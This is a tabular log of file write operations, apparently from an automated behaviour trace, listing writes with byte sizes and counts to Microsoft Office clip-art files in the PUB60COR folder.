| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04134_.WMF | size = 3445 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04134_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04134_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04134_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04174_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04174_.WMF | size = 2661 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04174_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04174_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04174_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04191_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04191_.WMF | size = 6661 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04191_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04191_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04191_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04195_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04195_.WMF | size = 4645 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04195_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04195_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04195_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04196_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04196_.WMF | size = 3173 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04196_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04196_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04196_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04206_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04206_.WMF | size = 7701 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04206_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04206_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04206_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04225_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04225_.WMF | size = 8517 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04225_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04225_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04225_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04235_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04235_.WMF | size = 7829 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04235_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04235_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04235_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04267_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04267_.WMF | size = 7829 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04267_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04267_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04267_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04269_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04269_.WMF | size = 2053 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04269_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04269_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04269_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04323_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04323_.WMF | size = 2517 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04323_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04323_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04323_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04326_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04326_.WMF | size = 3381 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04326_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04326_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04326_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04332_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04332_.WMF | size = 4325 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04332_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04332_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04332_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04355_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04355_.WMF | size = 3253 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04355_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04355_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04355_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04369_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04369_.WMF | size = 4837 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04369_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04369_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04369_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04384_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04385_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BABY_01.MID | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00116_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00141_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00141_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00141_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00141_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00146_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00155_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00160_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00173_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD05119_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD06102_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD06200_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD07761_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD07804_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD07831_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08758_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08773_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08808_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08868_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09031_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09194_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09662_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09664_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD10890_.GIF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD10972_.GIF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19563_.GIF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19582_.GIF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19695_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19827_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19828_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19986_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19988_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD20013_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00008_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00012_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00045_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00098_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00105_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00122_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00130_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00148_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00152_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00194_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00195_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00234_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00242_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00247_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00248_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00252_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00254_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00261_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00262_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00265_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00267_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00269_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00270_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00273_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00274_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00296_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00390_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00392_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00524_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00525_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00526_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00648_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00921_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00923_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00932_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00985_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BOAT.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BOATINST.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00076_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00078_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00092_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00100_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00135_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00136_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00145_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00174_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00184_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00186_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00200_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00224_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00438_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00439_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00440_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00441_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00442_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00443_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00444_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00445_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00453_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01080_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01603_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01634_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01635_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01636_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01637_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01638_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01639_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CARBN_01.MID | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CG1606.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CLASSIC1.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CLASSIC2.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CLIP.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CMNTY_01.MID | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CRANE.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CRANINST.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CUP.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CUPINST.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00117_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00121_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00234_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00255_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00256_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00261_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00297_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00372_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00405_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00407_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00413_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00414_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00419_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00437_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00448_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00449_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00687_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00705_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01015_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01039_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01138_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01139_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01140_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01143_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01145_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01146_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01151_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01152_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01157_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01160_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01162_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01163_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01166_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01167_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01168_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01169_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01170_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01171_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01172_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01173_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01176_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01178_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01179_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01180_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01181_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01182_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01183_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01186_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01366_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01434_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01585_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01586_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01628_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01629_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01630_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01631_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01761_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01772_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01793_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EAST_01.MID | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00010_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00019_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00172_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00184_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00006_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00202_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00222_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00242_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00319_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00320_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00397_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00902_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EXPLR_01.MID | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FALL_01.MID | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00074_.WMF | size = 1 |
|
1 | |
